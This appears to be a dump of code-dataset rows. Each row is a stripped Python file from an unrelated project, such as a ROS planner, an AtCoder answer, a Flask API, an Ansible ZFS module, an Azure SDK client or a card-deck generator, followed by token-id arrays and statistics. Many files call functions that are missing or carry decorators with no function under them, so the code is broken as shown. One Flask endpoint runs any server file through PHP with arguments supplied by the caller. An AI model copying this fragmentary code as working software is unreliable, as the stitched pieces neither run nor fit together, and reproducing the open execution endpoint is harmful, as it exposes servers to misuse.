# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseStamped, PointStamped
from move_base_msgs.msg import MoveBaseFeedback, MoveBaseResult, MoveBaseAction
import actionlib
import rospy
import tf
from sam_msgs.msg import ThrusterRPMs, ThrusterAngles
from std_msgs.msg import Float64, Header, Bool
import math
from visualization_msgs.msg import Marker
from tf.transformations import quaternion_from_euler
if __name__ == '__main__':
rospy.init_node('wp_depth_action_planner')
planner = WPDepthPlanner(rospy.get_name())
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
2,
15069,
2864,
399,
4487,
45409,
11,
20872,
71,
945,
3099,
347,
5183,
357,
46803,
382,
31,
74,
400,
13,
325,
11,
38487,
65,
5183,
31,
74,
400,
13,
325,
8,
198,
2,
198,
2,
2297,
... | 3.470219 | 638 |
'''input
23 2
1
9 12
21
'''
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
# Problem A
if __name__ == '__main__':
current_hour, add_hour = list(map(int, input().split()))
contest_hour = current_hour + add_hour
if contest_hour < 24:
print(contest_hour)
else:
print(contest_hour - 24)
| [
7061,
6,
15414,
201,
198,
1954,
362,
201,
198,
16,
201,
198,
201,
198,
24,
1105,
201,
198,
2481,
201,
198,
201,
198,
7061,
6,
201,
198,
201,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
201,
198,
2,... | 2.053254 | 169 |
'''
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are all surrounded by water.
Example 1:
Input:
11110
11010
11000
00000
Output: 1
Example 2:
Input:
11000
11000
00100
00011
Output: 3
'''
| [
7061,
6,
198,
198,
15056,
257,
362,
67,
10706,
3975,
286,
705,
16,
338,
357,
1044,
8,
290,
705,
15,
338,
357,
7050,
828,
954,
262,
1271,
286,
14807,
13,
1052,
7022,
318,
11191,
416,
1660,
290,
318,
7042,
416,
14320,
15909,
8604,
3... | 2.890511 | 137 |
# -*- coding: utf-8 -*-
#Department Module Description
"""
==============================================================================
created : 03/20/2017
Last update: 02/08/2021
Developer: Wei-Chun Chang
Lite Version 2 @Yishan08212019
API version 1.0
Filename: customizedHandle.py
Description: basically, all writes to the module will be opened to superuser only, for others, can only query data
1. register a department
2. query Department basic info.
3. query Department members
4. query Department sensors
Total = 6 APIs
==============================================================================
"""
#=======================================================
# System level modules
#=======================================================
#{{{
from sqlalchemy import *
from werkzeug.security import gen_salt
import subprocess #Yishan 05212020 subprocess 取代 os.popen
# import threading
#}}}
#=======================================================
# User level modules
#=======================================================
#{{{
from app import *
#Yishan@05212020 added for common modules
from app.modules import *
#}}}
__all__ = ('trigger_specific_program','iot_redis_device_keys_init')
ACCESS_SYSTEM_LIST = ["IOT"]
# # 建立 thread lock
# lock = threading.Lock()
#blueprint
CUSTOMIZED_API = Blueprint('CUSTOMIZED_API', __name__)
#{{{ def _list_iter(name)
def _list_iter(r,name):
"""
自定义redis列表增量迭代
:param name: redis中的name,即:迭代name对应的列表
:return: yield 返回 列表元素
"""
list_count = r.llen(name)
for index in range(list_count):
yield r.lindex(name, index)
#}}}
#=======================================================
# subprocess_check_output_program
# Date: 12142020@Yishan
# https://www.coder.work/article/3210794
# https://stackoverflow.com/questions/31683320/suppress-stderr-within-subprocess-check-output
#=======================================================
# {{{ def subprocess_check_output_program(cmd)
# }}}
#=======================================================
# 列出/var/www/html/download/files內所有檔案
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['GET'])
# }}}
#=======================================================
# 提供使用者生成下載檔案列表之id & pwd (gen_salt)
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案功能之id & pwd合法性
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案的有效期限若超過則刪除
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET'])
#}}}
#=======================================================
# 提供api觸發指定程式
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['GET']),
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['POST'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def trigger_specific_program(SYSTEM,selfUse=False,useThread=False,languages=None,programName=None,programData=None,Temp=False):
#{{{APIINFO
'''
{
"API_application":"提供觸發指定程式",
"API_parameters":{"uid":"使用者帳號"},
"API_path_parameters":{"SYSTEM":"合法的系統名稱"},
"API_postData":{
"bodytype":"Object",
"bodyschema":"{}",
"parameters":{
"languages":{"type":"String","requirement":"required","directions":"欲觸發的程式語言類型","example":"php"},
"programName":{"type":"String","requirement":"required","directions":"欲觸發的程式路徑加檔名","example":"/var/www/html/test.php"},
"programData":{"type":"Unlimited","requirement":"optional","directions":"欲丟入觸發程式的參數資料","example":"test"}
},
"precautions":{
"注意事項1":"languages目前只接受php語言",
"注意事項2":"programName程式路徑必須存在"
},
"example":[
{
"languages":"php",
"programName":"test.php",
"programData":"123"
}
]
},
"API_message_parameters":{"GetProgramResponse":"Unlimited+取得觸發程式回傳的值"},
"API_example":{
"Response": "ok",
"APIS": "POST /api/IOT/1.0/Customized/Trigger/Specific/Program",
"OperationTime": "3.020",
"BytesTransferred": 223,
"System": "IOT",
"GetProgramResponse": "test"
}
}
'''
#}}}
err_msg = "error"
languages_config = {
"php":"/usr/bin/php",
"c":""
}
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
# if SYSTEM not in list(set(globalvar.SYSTEMLIST[globalvar.SERVERIP]).intersection(set(ACCESS_SYSTEM_LIST))):
# dicRet["Response"] = "system:{} has no privillege to use this API".format(SYSTEM)
# return jsonify( **dicRet)
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
if not VerifyDataStrLawyer(request.data).verify_json():
dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
return jsonify( **dicRet)
reqdataDict = json.loads(request.data)
if isinstance(reqdataDict,type(u"")):
reqdataDict = json.loads(reqdataDict)
post_parameter = ["languages","programName","programData"]
if not check_post_parameter_exist(reqdataDict,post_parameter):
dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
return jsonify( **dicRet)
languages = reqdataDict.get("languages")
programName = reqdataDict.get("programName")
programData = reqdataDict.get("programData")
# print "~~~~languages~~~~"
# print languages
if languages not in languages_config.keys():
dicRet["Response"] = "Currently only php and C programs can be executed"
return jsonify( **dicRet)
# print "~~~~programName~~~~"
# print programName
# print "~~~~programData~~~~"
# print programData
# print type(programData)
if isinstance(programData,dict): programData = json.dumps(programData)
# print "~~~~programData~~~~"
# print programData
if not os.path.isfile(programName):
dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(programName)
return jsonify( **dicRet)
cmd = [languages_config[languages],programName]
if programData: cmd.append(programData)
# cmd = "{}{}".format(languages_config[languages],programName)
# if programData: cmd+=" '{}'".format(programData)
# print "~~~cmd~~~"
# print cmd
try:
if useThread:
# print "~~~~~trigger start~~~~~~"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
if Temp:
from celeryApp.celeryTasks import celery_trigger_specific_program
celery_trigger_specific_program.apply_async(args=(cmd,SYSTEM), routing_key='high', queue="H-queue1")
else:
worker = TriggerProgramWorkerThread(os.getpid(), lock, subprocess_check_output_program, cmd, SYSTEM)
worker.start()
# print "~~~~~trigger over~~~~~~"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
err_msg = "ok"
return
else:
if languages == "c": cmd.pop(0)
# print "!!!!!!!!!!!!!!!!!"
dicRet["StartProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
process = subprocess_check_output_program(ConvertData().convert(cmd),SYSTEM)
# print "~~~~process~~~~"
# print process
# print "~~~~type process~~~~"
# print type(process)
dicRet["EndProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# print "!!!!!!!!!!!!!!!!!"
if process[0]:
dicRet["GetProgramResponse"] = {"output":process[1],"returncode":0}
err_msg = "ok"
else:
# print process[2]
del process[2]["cmd"]
dicRet["GetProgramResponse"] = process[2]
err_msg = "error"
except Exception as e:
print "~~~Exception~~~"
print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
print e
print sys.exc_info()
finally:
if not selfUse:
# dicRet["THISTIME"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
dicRet["Response"] = err_msg
return jsonify(**dicRet)
#}}}
#=======================================================
# Definition: For IoT 初始化IoT所需的redis mes_device_status keys(hash) from mysql table:
# Date: 12292020@Yishan
#=======================================================
# {{{def iot_redis_device_keys_init(SYSTEM)
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Init/Redis/Device/Keys', methods = ['GET'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def iot_redis_device_keys_init(SYSTEM, selfUse=False):
"""
For IoT 初始化IoT所需的redis device keys(hash)
Args:
SYSTEM: 使用之系統名稱
Returns:
no return
"""
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
all_device = {}
err_msg = "error"
try:
DbSession,metadata,engine= appPaaS.getDbSessionType(system=SYSTEM)
if DbSession is None:
return
sess = DbSession()
queryTable = Table("preload" , metadata, autoload=True)
for row in sess.query(queryTable).all():
drow = AdjustDataFormat().format(row._asdict())
all_device[drow["main_key"]+"_"+drow["combine_key"]] = json.loads(drow["combine_list"])
err_msg = "ok" #done successfully
# http://stackoverflow.com/questions/4112337/regular-expressions-in-sqlalchemy-queries
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),SYSTEM)
finally:
if 'DbSession' in locals().keys() and DbSession is not None:
sess.close()
DbSession.remove()
engine.dispose()
if err_msg != "ok":
if selfUse: return
if not selfUse:
dicRet["Response"] = err_msg
return jsonify( **dicRet)
err_msg = "error"
try:
redis_db = globalvar.SYSTEMLIST[globalvar.SERVERIP].index(SYSTEM)
dbRedis,_,_ = appPaaS.getDbSessionType(system=SYSTEM,dbName=redis_db,forRawData="redis")
if dbRedis is None:
return
for key,value in all_device.items():
#若key不存在,直接建立
if not dbRedis.exists(key):
dbRedis.hmset(key, value)
#若存在,比較value物件的key,抓取不重複的建立
else:
#差集(舊的多的key,需刪除)
fields_need_del = list(set(dbRedis.hkeys(key)).difference(value.keys()))
if fields_need_del: dbRedis.hdel(key, *fields_need_del)
#差集(新的多的key,需新增)
fields_need_add = list(set(value.keys()).difference(dbRedis.hkeys(key)))
if fields_need_add:
for value_key,value_value in value.items():
if value_key in fields_need_add:
dbRedis.hset(key, value_key, value_value)
#檢查mes_device_status_* keys是否需刪除(多的需刪除)
keys_need_del = list(set(dbRedis.keys("mes_device_status_*")).difference(all_device.keys()))
if keys_need_del: dbRedis.delete(*keys_need_del)
err_msg = "ok"
except Exception as e:
err_msg = appPaaS.catch_exception(e, sys.exc_info(), SYSTEM)
finally:
if not selfUse:
dicRet["Response"] = err_msg
return jsonify( **dicRet)
#}}} | [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
36261,
19937,
12489,
198,
37811,
198,
23926,
25609,
855,
198,
25598,
220,
220,
220,
1058,
7643,
14,
1238,
14,
5539,
198,
5956,
4296,
25,
7816,
14,
2919,
14,
1238,
2... | 2.120585 | 6,286 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Nate Coraor <nate@coraor.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: zfs_delegate_admin
short_description: Manage ZFS delegated administration (user admin privileges)
description:
- Manages ZFS file system delegated administration permissions, which allow unprivileged users to perform ZFS
operations normally restricted to the superuser.
- See the C(zfs allow) section of C(zfs(1M)) for detailed explanations of options.
- This module attempts to adhere to the behavior of the command line tool as much as possible.
requirements:
- "A ZFS/OpenZFS implementation that supports delegation with `zfs allow`, including: Solaris >= 10, illumos (all
versions), FreeBSD >= 8.0R, ZFS on Linux >= 0.7.0."
options:
name:
description:
- File system or volume name e.g. C(rpool/myfs).
required: true
type: str
state:
description:
- Whether to allow (C(present)), or unallow (C(absent)) a permission.
- When set to C(present), at least one "entity" param of I(users), I(groups), or I(everyone) are required.
- When set to C(absent), removes permissions from the specified entities, or removes all permissions if no entity params are specified.
required: true
choices: [ absent, present ]
default: present
users:
description:
- List of users to whom permission(s) should be granted.
type: list
groups:
description:
- List of groups to whom permission(s) should be granted.
type: list
everyone:
description:
- Apply permissions to everyone.
type: bool
default: no
permissions:
description:
- The list of permission(s) to delegate (required if C(state) is C(present)).
type: list
choices: [ allow, clone, create, destroy, diff, hold, mount, promote, readonly, receive, release, rename, rollback, send, share, snapshot, unallow ]
local:
description:
- Apply permissions to C(name) locally (C(zfs allow -l)).
type: bool
descendents:
description:
- Apply permissions to C(name)'s descendents (C(zfs allow -d)).
type: bool
recursive:
description:
- Unallow permissions recursively (ignored when C(state) is C(present)).
type: bool
default: no
author:
- Nate Coraor (@natefoo)
'''
EXAMPLES = r'''
- name: Grant `zfs allow` and `unallow` permission to the `adm` user with the default local+descendents scope
community.general.zfs_delegate_admin:
name: rpool/myfs
users: adm
permissions: allow,unallow
- name: Grant `zfs send` to everyone, plus the group `backup`
community.general.zfs_delegate_admin:
name: rpool/myvol
groups: backup
everyone: yes
permissions: send
- name: Grant `zfs send,receive` to users `foo` and `bar` with local scope only
community.general.zfs_delegate_admin:
name: rpool/myfs
users: foo,bar
permissions: send,receive
local: yes
- name: Revoke all permissions from everyone (permissions specifically assigned to users and groups remain)
community.general.zfs_delegate_admin:
name: rpool/myfs
everyone: yes
state: absent
'''
# This module does not return anything other than the standard
# changed/state/msg/stdout
RETURN = '''
'''
from itertools import product
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
15069,
25,
357,
66,
8,
1853,
11,
23486,
2744,
64,
273,
1279,
77,
378,
31,
66,
5799,
273,
13,
2398,
29,
198,
2,
... | 2.99245 | 1,192 |
#Funções
''''
===========================================
def equacao_reta(x):
y_x = 2 * x + 1
return y_x
x = float(input("Entre com o valor a ser calculado para y(x) = 2x+1: "))
resultado = equacao_reta(x)
print("O resultado encontrado foi Y = %.0f" %resultado)
============================================
'''
lista_x = [1,2,3,4,5,6]
lista_y = []
for valor_x in lista_x:
lista_y.append(equacao_reta(valor_x))
for valor_x,valor_y in zip(lista_x,lista_y):
print("O valor de y(%0.1f) = %0.1f"%(valor_x,valor_y)) | [
2,
24629,
16175,
127,
113,
274,
198,
39115,
198,
10052,
2559,
18604,
198,
198,
4299,
1602,
330,
5488,
62,
1186,
64,
7,
87,
2599,
198,
220,
220,
220,
331,
62,
87,
796,
362,
1635,
2124,
1343,
352,
198,
220,
220,
220,
1441,
331,
62,
... | 2.170732 | 246 |
from typing import Tuple, cast
from ..base import BaseFile
from .part import BlockingParts
from ...models.file import (
FileModel,
UploadUrlModel,
FileDeleteModel,
PartCancelModel
)
from ...settings import DownloadSettings, CopyFileSettings
from ...exceptions import AwaitingOnly
from ...utils import UploadUrlCache
from ...decorators import authorize_required
| [
6738,
19720,
1330,
309,
29291,
11,
3350,
198,
198,
6738,
11485,
8692,
1330,
7308,
8979,
198,
198,
6738,
764,
3911,
1330,
1086,
8629,
42670,
198,
198,
6738,
2644,
27530,
13,
7753,
1330,
357,
198,
220,
220,
220,
9220,
17633,
11,
198,
22... | 3.5 | 110 |
from tests.cli import make_client, run_cmd
from tests.util import answers
| [
6738,
5254,
13,
44506,
1330,
787,
62,
16366,
11,
1057,
62,
28758,
198,
6738,
5254,
13,
22602,
1330,
7429,
628,
628,
628
] | 3.590909 | 22 |
# Imports
import numpy as np
import os
import json
import sys
# noinspection PyPep8Naming
from scipy.spatial.transform import Rotation
# This class converts AMASS SMPLH .npz body animation files into Unity-readable .json files.
# See AMASSConverterExamples file for an example on how to use this class.
if __name__ == "__main__":
main() | [
2,
1846,
3742,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
198,
11748,
33918,
198,
11748,
25064,
198,
2,
645,
1040,
14978,
9485,
47,
538,
23,
45,
3723,
198,
6738,
629,
541,
88,
13,
2777,
34961,
13,
35636,
1330,
371,
14221,
... | 3.254717 | 106 |
from InterpreteF2.NodoAST import NodoArbol
from InterpreteF2.Tabla_de_simbolos import Tabla_de_simbolos
from InterpreteF2.Arbol import Arbol
from InterpreteF2.Valor.Valor import Valor
from InterpreteF2.Primitivos.TIPO import TIPO
from InterpreteF2.Primitivos.COMPROBADOR_deTipos import COMPROBADOR_deTipos
from InterpreteF2.Reporteria.ReporteOptimizacion import ReporteOptimizacion
# Reglas de optimizacion
# Regla 4
# Regla 5 | [
6738,
4225,
3866,
660,
37,
17,
13,
45,
24313,
11262,
1330,
399,
24313,
3163,
28984,
198,
6738,
4225,
3866,
660,
37,
17,
13,
33349,
5031,
62,
2934,
62,
82,
14107,
349,
418,
1330,
16904,
5031,
62,
2934,
62,
82,
14107,
349,
418,
198,
... | 2.52 | 175 |
# coding: utf-8
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from strtodate import strtodate
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
25064,
198,
11748,
28686,
198,
17597,
13,
6978,
13,
28463,
7,
16,
11,
28686,
13,
6978,
13,
22179,
7,
17597,
13,
6978,
58,
15,
4357,
705,
492,
6,
4008,
198,
6738,
965,
83,
375,
378,
133... | 2.44 | 50 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class LbOperations(object):
"""LbOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def create_or_update(
self, resource_group_name, deployment_name, load_balancer_name, content_version=None, backend_pool_name=None, dns_name_type="none", frontend_ip_name="LoadBalancerFrontEnd", location=None, private_ip_address=None, private_ip_address_allocation="dynamic", public_ip_address=None, public_ip_address_allocation="dynamic", public_ip_address_type="new", public_ip_dns_name=None, subnet=None, subnet_address_prefix="10.0.0.0/24", subnet_type="none", tags=None, virtual_network_name=None, vnet_address_prefix="10.0.0.0/16", custom_headers=None, raw=False, **operation_config):
"""
Create or update a virtual machine.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param load_balancer_name: Name for load balancer.
:type load_balancer_name: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param backend_pool_name: Name of load balancer backend pool.
:type backend_pool_name: str
:param dns_name_type: Associate VMs with a public IP address to a DNS
name. Possible values include: 'none', 'new'
:type dns_name_type: str or :class:`dnsNameType
<lbcreationclient.models.dnsNameType>`
:param frontend_ip_name: Name of the frontend IP configuration.
:type frontend_ip_name: str
:param location: Location for load balancer resource.
:type location: str
:param private_ip_address: Static private IP address to use.
:type private_ip_address: str
:param private_ip_address_allocation: Private IP address allocation
method. Possible values include: 'dynamic', 'static'
:type private_ip_address_allocation: str or
:class:`privateIpAddressAllocation
<lbcreationclient.models.privateIpAddressAllocation>`
:param public_ip_address: Name or ID of the public IP address to use.
:type public_ip_address: str
:param public_ip_address_allocation: Public IP address allocation
method. Possible values include: 'dynamic', 'static'
:type public_ip_address_allocation: str or
:class:`publicIpAddressAllocation
<lbcreationclient.models.publicIpAddressAllocation>`
:param public_ip_address_type: Type of Public IP Address to associate
with the load balancer. Possible values include: 'none', 'new',
'existingName', 'existingId'
:type public_ip_address_type: str or :class:`publicIpAddressType
<lbcreationclient.models.publicIpAddressType>`
:param public_ip_dns_name: Globally unique DNS Name for the Public IP
used to access the Virtual Machine (new public IP only).
:type public_ip_dns_name: str
:param subnet: The subnet name or ID to associate with the load
balancer. Cannot be used in conjunction with a Public IP.
:type subnet: str
:param subnet_address_prefix: The subnet address prefix in CIDR
format (new subnet only).
:type subnet_address_prefix: str
:param subnet_type: Use new, existing or no subnet. Possible values
include: 'none', 'new', 'existingName', 'existingId'
:type subnet_type: str or :class:`subnetType
<lbcreationclient.models.subnetType>`
:param tags: Tags object.
:type tags: object
:param virtual_network_name: The VNet name containing the subnet.
Cannot be used in conjunction with a Public IP.
:type virtual_network_name: str
:param vnet_address_prefix: The virtual network IP address prefix in
CIDR format (new subnet only).
:type vnet_address_prefix: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.DeploymentLb(content_version=content_version, backend_pool_name=backend_pool_name, dns_name_type=dns_name_type, frontend_ip_name=frontend_ip_name, load_balancer_name=load_balancer_name, location=location, private_ip_address=private_ip_address, private_ip_address_allocation=private_ip_address_allocation, public_ip_address=public_ip_address, public_ip_address_allocation=public_ip_address_allocation, public_ip_address_type=public_ip_address_type, public_ip_dns_name=public_ip_dns_name, subnet=subnet, subnet_address_prefix=subnet_address_prefix, subnet_type=subnet_type, tags=tags, virtual_network_name=virtual_network_name, vnet_address_prefix=vnet_address_prefix)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DeploymentLb')
# Construct and send request
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
| [
2,
16529,
1783,
10541,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
4091,
13789,
13,
14116,
287,
262,
1628,
6808,
329,
5964,
1321,
13,
198,
2,
16529,
1783,
10541,
198,... | 2.776325 | 2,982 |
if __name__ == '__main__':
math()
| [
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
10688,
3419,
198
] | 2.105263 | 19 |
#! /usr/bin/env python3
import csv
import json
import os
import pathlib
import sys
import numpy as np
import cairo
import argparse
import layout
from draw_card import drawCard
from card_model import CardModel
from card_model import CardDeck
def extant_file(x):
"""
'Type' for argparse - checks that file exists but does not open.
"""
if not os.path.exists(x):
# Argparse uses the ArgumentTypeError to give a rejection message like:
# error: argument input: x does not exist
raise argparse.ArgumentTypeError("{0} does not exist".format(x))
return x
##### CLI args #####
parser = argparse.ArgumentParser(description="Deck Generator for Game Designers")
parser.add_argument('-d', '--deck', type=extant_file, help='csv file containing the deck', metavar="FILE", required=True)
parser.add_argument('-c', '--cards', type=extant_file, help='json file containing cards description', metavar="FILE", required=True)
parser.add_argument('-i', '--images', help='Add images to cards', action='store_true')
parser.add_argument('-r', '--rgb', help='Update layout card border colour with given R,G,B, only works with default layout', nargs=3, type=int)
parser.add_argument('-l', '--layout', help='Use a different layout than default', type=extant_file, metavar="FILE")
args = parser.parse_args()
handle_images = args.images
modify_layout = args.rgb
deck_file = args.deck
cards_file = args.cards
#deck_file = './example_deck.csv'
deck_name = os.path.basename(deck_file)[:-4]
nameList = []
list_copy = []
with open(deck_file, encoding='utf-8') as csvFile:
reader = csv.reader(csvFile)
list_copy.append(reader.__next__())
for row in reader:
list_copy.append(row)
nameList = nameList + [row[1]] * int(row[0])
cards = CardDeck(cards_file)
cardList = [CardModel(name,cards.getDb()) for name in nameList]
pageList = [cardList[i:i+9] for i in range(0, len(cardList), 9)]
if not os.path.exists('decks'):
os.mkdir('decks')
if not os.path.exists(os.path.join('decks',deck_name)):
os.mkdir(os.path.join('decks',deck_name))
for page_number in range(len(pageList)):
print(f'Page {page_number}:')
page = pageList[page_number]
surf = layout.getSurface()
ctx = cairo.Context(surf)
for i in range(len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
print(cardPos)
print(card)
mat = layout.getMatrix(*cardPos, surf)
ctx.set_matrix(mat)
drawCard(card, ctx)
surf.write_to_png(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
from add_images import BaseImage
from add_images import addImage
from add_images import processImage
from PIL import Image
if (modify_layout is not None):
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
temp = baseImage.baseImage.convert('RGBA')
data = np.array(temp)
red, green, blue, alpha = data.T
for i in range(0,63):
white_areas = (red == 190+i) & (blue == 190+i) & (green == 190+i)
data[..., :-1][white_areas.T] = (modify_layout[0], modify_layout[1], modify_layout[2])
baseImage.update(Image.fromarray(data))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
#import pdb;pdb.set_trace()
if (handle_images):
if not os.path.exists(os.path.join('decks',deck_name,'images')):
os.mkdir(os.path.join('decks',deck_name,'images'))
#open the previous png to add the images
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
for i in range (len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
processImage(card,deck_name)
baseImage.update(addImage(card,baseImage,deck_name, cardPos))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
with open(f'decks/{deck_name}/{deck_name}.csv', 'w') as deck_copy:
filewriter = csv.writer(deck_copy)
for element in list_copy:
filewriter.writerow(element)
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
11748,
269,
21370,
